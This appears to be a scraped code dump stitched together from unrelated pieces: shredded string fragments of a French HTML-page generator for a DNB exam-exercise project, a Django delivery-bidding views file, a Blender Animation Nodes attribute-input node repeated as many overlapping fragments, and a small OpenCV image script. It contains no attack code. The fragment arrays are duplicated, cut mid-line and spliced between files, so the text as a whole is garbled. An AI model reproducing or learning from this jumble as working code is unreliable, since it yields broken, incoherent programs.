"<h3> Notes </h3> <p> Les fichiers de la documentations sont générés dans le",
"class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le",
"le site de l'APMEP<br> Pour le moment le test se fait sur le",
"le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ])",
"un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex",
"# @author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass # On",
"#!/usr/bin/python3 #-*- coding: utf8 -*- # @author : <NAME> \"\"\" Génère une page",
"pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\"",
"paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation",
"<ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au",
"# On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la",
"il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p>",
"head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) #",
"class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers",
"de polynésie 2020<br><br> Pour générer la documentation il faut installer le paquet python",
"<b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de",
"du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le",
"projet consiste à récupérer tous les exercices des sujets DNB en partage sur",
"partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les",
"<p> Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les",
"dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\"",
"les exercices des sujets DNB en partage sur le site de l'APMEP<br> Pour",
"<li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b>"
] |
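The generator above star-imports pyPack.HTML_constantes and iterates over docTypeHeadStyle, calling indexHTML.writelines(elt) on each element, so each element must itself be an iterable of strings. The module's contents are never shown; the following is a hypothetical minimal sketch, in which everything except the module path and the name docTypeHeadStyle is an assumption.

# pyPack/HTML_constantes.py -- hypothetical sketch; only the module path and
# the name docTypeHeadStyle are attested by the generator above.
docTypeHeadStyle = [
    ["<!DOCTYPE html>\n", '<html lang="fr">\n'],
    ["<head>\n", '    <meta charset="utf-8">\n', "    <title>Projet DNB</title>\n"],
    ["<style>\n", "    .navButton { display: inline-block; padding: 0.5em; }\n",
     "</style>\n", "</head>\n"],
]

Grouping the boilerplate as lists of lines keeps the writelines calls in the generator trivial: each chunk is written in one call, in order.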
# deliverer/views.py
from django.shortcuts import render, redirect, get_list_or_404, get_object_or_404
from database.models import user, restaurant, address
from helper import parse_req_body, userTypeChecker
import django.views

# Create your views here.

def home(request):
    my_user = None
    # makes sure user is deliverer
    try:
        my_user = request.user
        userIs = userTypeChecker(my_user)
        if userIs(user.Deliverer) != True:
            response = redirect('home-nexus')
            return response
    except Exception as e:
        print(e)
        response = redirect('home-nexus')
        return response
    except:
        response = redirect('home-nexus')
        return response
    my_deliverer = user.Deliverer.objects.get(user=my_user)
    registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H'
    if registered != True:  # if not registered
        return redirect('deliverer-register')
    if request.method == "POST":  # If bidded
        body = parse_req_body(request.body)
        amount = body['amount']
        order_id = body['orderId']
        order = restaurant.Order.objects.get(id=order_id)
        new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order)
        new_bid.save()
    unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant=my_deliverer.restaurant)
    pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False)
    won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True)
    open_orders = []
    for order in unchosen_orders:
        if len(pending_bids.filter(order=order)) == 0:
            open_orders.append(order)
    print(open_orders)
    print(pending_bids)
    print(won_bids)
    context = {
        'warnings': my_deliverer.warnings,
        'openOrders': open_orders,
        'pendingBids': pending_bids,
        'winningBids': won_bids
    }
    return render(request, 'deliverer/home.html', context=context)

def register(request):
    my_user = None
    try:
        my_user = request.user
        isType = userTypeChecker(my_user)
        if isType(user.Deliverer) != True:
            response = redirect('home-nexus')
            return response
    except:
        response = redirect('home-nexus')
        return response
    my_deliverer = user.Deliverer.objects.get(user=my_user)
    registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H'
    if registered:
        return redirect('deliverer-home')
    registering = my_deliverer.restaurant is None and my_deliverer.status != 'H'
    restaurants = restaurant.Restaurant.objects.all()
    context = {'restaurants': restaurants, 'registering': registering}
    if request.method == "POST":
        body = parse_req_body(request.body)
        resturant_id = int(body['id'])
        reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id)
        my_deliverer.restaurant = reg_resturant
        my_deliverer.save()
        context['registering'] = False
    return render(request, 'deliverer/register.html', context=context)

def order(request, pk):
    my_user = request.user
    order = get_object_or_404(restaurant.Order, pk=pk)
    customer = order.customer
    customer_address = address.CustomerAddress.objects.get(customer=customer)
    my_resturant = user.Deliverer.objects.get(user=my_user).restaurant
    restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant)
    if request.method == "POST":
        body = parse_req_body(request.body)
        rating = int(body['rating'])
        if 0 <= rating <= 5:
            order.status = 'D'
            order.customer_rating = rating
            try:
                customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant)
            except:
                customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N')
                customer_status.save()
            customer_status.update_status(rating)
            order.save()
    rating = order.delivery_rating
    return render(request, 'deliverer/order.html', context={
        'order': order,
        'customerAddress': customer_address,
        'restaurantAddress': restaurant_address
    })
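All three views call parse_req_body(request.body), imported from helper, and then index the result with string keys ('amount', 'orderId', 'id', 'rating'). The helper itself is never shown; a minimal sketch, assuming the frontend posts a JSON body, might look like this.

# helper.py -- hypothetical sketch of parse_req_body; the real helper is not
# shown above, and this assumes the client sends JSON request bodies.
import json

def parse_req_body(raw_body: bytes) -> dict:
    """Decode a raw request body such as b'{"orderId": 3, "amount": 5}' into a dict."""
    return json.loads(raw_body.decode("utf-8"))

Whatever the real transport is, it must yield a mapping with exactly those keys, since the views index into the result directly with no fallback.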
# Animation Nodes: Object Attribute Input node
import bpy
from bpy.props import *
from ... utils.code import isCodeValid
from ... events import executionCodeChanged
from ... base_types import AnimationNode

class ObjectAttributeInputNode(bpy.types.Node, AnimationNode):
    bl_idname = "an_ObjectAttributeInputNode"
    bl_label = "Object Attribute Input"
    bl_width_default = 160
    errorHandlingType = "MESSAGE"

    attribute: StringProperty(name = "Attribute", default = "", update = executionCodeChanged)

    def create(self):
        self.newInput("Object", "Object", "object", defaultDrawType = "PROPERTY_ONLY")
        self.newOutput("Generic", "Value", "value")

    def draw(self, layout):
        layout.prop(self, "attribute", text = "")

    def drawAdvanced(self, layout):
        self.invokeFunction(layout, "createAutoExecutionTrigger", text = "Create Execution Trigger")

    def getExecutionCode(self, required):
        code = self.evaluationExpression
        if not isCodeValid(code):
            yield "self.setErrorMessage('Invalid Syntax', show = len(self.attribute.strip()) > 0)"
            yield "value = None"
            return

        yield "try:"
        yield "    " + code
        yield "except:"
        yield "    if object: self.setErrorMessage('Attribute not found')"
        yield "    value = None"

    @property
    def evaluationExpression(self):
        if self.attribute.startswith("["): return "value = object" + self.attribute
        else: return "value = object." + self.attribute

    def createAutoExecutionTrigger(self):
        item = self.nodeTree.autoExecution.customTriggers.new("MONITOR_PROPERTY")
        item.idType = "OBJECT"
        item.dataPath = self.attribute
        item.object = self.inputs["Object"].object
"\"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self,",
"\" \" + code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\"",
"drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self, required): code",
"\"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\",",
"default = \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType =",
"self.newInput(\"Object\", \"Object\", \"object\", defaultDrawType = \"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self,",
"\"PROPERTY_ONLY\") self.newOutput(\"Generic\", \"Value\", \"value\") def draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def",
"class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default =",
"attribute: StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged) def create(self): self.newInput(\"Object\",",
"\"value\") def draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout,",
"self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else: return \"value = object.\" +",
"\"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged) def create(self):",
"+ code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \"",
"bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default = 160 errorHandlingType =",
"evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else: return \"value =",
"... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label = \"Object",
"self.attribute else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\")",
"\"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \" value = None\"",
"yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \" value =",
"layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def getExecutionCode(self, required): code =",
"events import executionCodeChanged from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname =",
"if object: self.setErrorMessage('Attribute not found')\" yield \" value = None\" @property def evaluationExpression(self):",
"= \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution Trigger\") def",
"> 0)\" yield \"value = None\" return yield \"try:\" yield \" \" +",
"getExecutionCode(self, required): code = self.evaluationExpression if not isCodeValid(code): yield \"self.setErrorMessage('Invalid Syntax', show =",
"\"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text = \"Create Execution",
"draw(self, layout): layout.prop(self, \"attribute\", text = \"\") def drawAdvanced(self, layout): self.invokeFunction(layout, \"createAutoExecutionTrigger\", text",
"None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute else:",
"object\" + self.attribute else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item",
"errorHandlingType = \"MESSAGE\" attribute: StringProperty(name = \"Attribute\", default = \"\", update = executionCodeChanged)",
"code yield \"except:\" yield \" if object: self.setErrorMessage('Attribute not found')\" yield \" value",
"from ... base_types import AnimationNode class ObjectAttributeInputNode(bpy.types.Node, AnimationNode): bl_idname = \"an_ObjectAttributeInputNode\" bl_label =",
"= None\" @property def evaluationExpression(self): if self.attribute.startswith(\"[\"): return \"value = object\" + self.attribute",
"\"an_ObjectAttributeInputNode\" bl_label = \"Object Attribute Input\" bl_width_default = 160 errorHandlingType = \"MESSAGE\" attribute:",
"else: return \"value = object.\" + self.attribute def createAutoExecutionTrigger(self): item = self.nodeTree.autoExecution.customTriggers.new(\"MONITOR_PROPERTY\") item.idType"
] |
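To see what the generated execution code does outside of Blender, here is a minimal standalone sketch of the same expression-building and try/except evaluation. Dummy, evaluation_expression, and evaluate are hypothetical stand-ins for the node's object input and its error reporting; they are not part of the Animation Nodes API.

# Standalone sketch of the node's evaluation logic (assumptions noted above).
class Dummy:
    location = (1.0, 2.0, 3.0)

def evaluation_expression(attribute):
    # Bracketed paths like '["my_prop"]' are appended directly; plain
    # names get a dot, mirroring evaluationExpression in the node above.
    if attribute.startswith("["):
        return "value = object" + attribute
    return "value = object." + attribute

def evaluate(obj, attribute):
    namespace = {"object": obj, "value": None}
    try:
        exec(evaluation_expression(attribute), namespace)
    except Exception:
        if obj:
            print("Attribute not found")  # stands in for setErrorMessage
    return namespace["value"]

print(evaluate(Dummy(), "location"))          # -> (1.0, 2.0, 3.0)
print(evaluate({"my_prop": 5}, '["my_prop"]'))  # -> 5, via the bracket branch
print(evaluate(Dummy(), "missing"))           # -> None, after the error message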
import cv2

img = cv2.imread('image.jpg')
cv2.imshow("Image", img)
cv2.waitKey(0)
cv2.imwrite("new_image.jpg", img)
cv2.destroyAllWindows()
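Note that cv2.imread does not raise on a missing or unreadable file; it returns None, and the later imshow/imwrite calls then fail. A slightly more defensive variant of the same script, keeping the same placeholder file names, checks the result first:

import cv2

img = cv2.imread('image.jpg')
if img is None:  # imread returns None instead of raising on failure
    raise SystemExit("could not read image.jpg")

cv2.imshow("Image", img)           # display the image in a window
cv2.waitKey(0)                     # block until any key is pressed
cv2.imwrite("new_image.jpg", img)  # save an unchanged copy
cv2.destroyAllWindows()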